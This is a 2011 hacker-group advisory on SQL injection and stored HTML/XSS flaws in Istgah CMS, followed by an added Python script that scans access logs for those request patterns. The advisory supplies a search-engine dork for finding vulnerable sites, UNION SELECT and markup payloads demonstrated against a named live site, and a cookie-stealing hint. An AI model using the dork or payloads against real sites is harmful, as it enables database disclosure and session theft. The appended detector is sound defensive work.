===========================================================================
# Istgah Cms Multiple Vulnerability
===========================================================================
###########################################################################
# Name: Istgah Cms Multiple Vulnerability
# Vendor: http://www.iran-team.com/agahi1.html
# Price: $40
# Date: 2011-04-15
# Author: Ashiyane Digital Security Team
# Thanks to: 1337day.com,Securityreason.com,packetstormsecurity.com,
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.ashiyane.org/forums/
###########################################################################
###########################################################################
[+] Dork: inurl:"view_ad.php?id=" & intext:"Power By :www.iran-team.com"
###########################################################################
[+] SQL Injection Vulnerability:
[+] Vulnerable Pages: view_ad.php & main_group.php & sub_group.php & ...
[+] Demo: http://banketabligh.com/main_group.php?id=1/**/and/**/1=0/**/union/**/all/**/select/**/@@version
###########################################################################
###########################################################################
[+] Cross Site Scripting / Html Injection Vulnerability:
[+] Vulnerability: Search.php
[+] Demo: http://banketabligh.com/search.php?val=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3EXroGuE%3C/font%3E%3C/marquee%3E
[+] You Can Put Ur Script in Search Field .. it'll save and After running any tag alert will show :)) It's ..?
[+] At Last .. Stealing Cookie ~> Register > AddAdvertis(Agahie Jadid) > Your Script > ... !
###########################################################################
===========================================================================
# Gr33tz:
# Ashiyane Members : BehroozIce,Q7x,,Virangar,Iman_taktaz,Keivan,Ali_eagle
# Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world
# Gladiator,Wahid,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,fr0nk
# mzhacker,zend,milad-bushehr,aliakh,__amir__,anti206,ruin3r,Hijacker,Rz04
# &
# 1337 Member: r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger
# Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul,
===========================================================================
# DisCovered By XroGuE !!!
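
For defenders running this CMS, an added example (not part of the original advisory and not the vendor's code) that scans web access logs for the two request shapes shown above: a non-integer id on the listed pages, with /**/ comment padding normalised, and HTML markup in the val parameter of search.php. It assumes the common/combined access-log format; the names classify and SAMPLE_LOG are hypothetical, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pages and parameters named in the advisory.
SQLI_PAGES = {"view_ad.php", "main_group.php", "sub_group.php"}
XSS_PAGE, XSS_PARAM = "search.php", "val"

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)   # inline SQL comments used in place of spaces
SQL_RE = re.compile(r"\b(union|select|and|or)\b|@@", re.I)
TAG_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>", re.I)

SAMPLE_LOG = [  # constructed lines; request paths mirror the advisory's two demo requests
    '192.0.2.10 - - [15/Apr/2011:10:00:01 +0000] "GET /view_ad.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [15/Apr/2011:10:00:05 +0000] "GET /main_group.php?id=1/**/and/**/1=0/**/union/**/all/**/select/**/@@version HTTP/1.1" 200 2048',
    '192.0.2.12 - - [15/Apr/2011:10:00:09 +0000] "GET /search.php?val=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3EXroGuE%3C/font%3E%3C/marquee%3E HTTP/1.1" 200 3072',
    '192.0.2.13 - - [15/Apr/2011:10:00:12 +0000] "GET /search.php?val=car HTTP/1.1" 200 4096',
]

def classify(log_line):
    """Return a list of (finding, page, decoded_value) tuples for one access-log line."""
    m = REQ_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    page = url.path.rsplit("/", 1)[-1].lower()
    params = parse_qs(url.query, keep_blank_values=True)  # parse_qs also percent-decodes
    findings = []
    if page in SQLI_PAGES:
        for value in params.get("id", []):
            # A record id should only ever be an ASCII integer; anything else is suspect.
            if not (value.isascii() and value.isdigit()):
                flat = COMMENT_RE.sub(" ", value)  # undo /**/ padding before matching
                kind = "sqli" if SQL_RE.search(flat) else "non-numeric-id"
                findings.append((kind, page, flat))
    if page == XSS_PAGE:
        for value in params.get(XSS_PARAM, []):
            if TAG_RE.search(value):
                findings.append(("html-injection", page, value))
    return findings

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for finding in classify(line):
            print(finding)
```

Access logs only record the query string, so markup submitted through the advert form in a POST body will not appear here. The integer-only rule for id is also the input check the listed pages are missing.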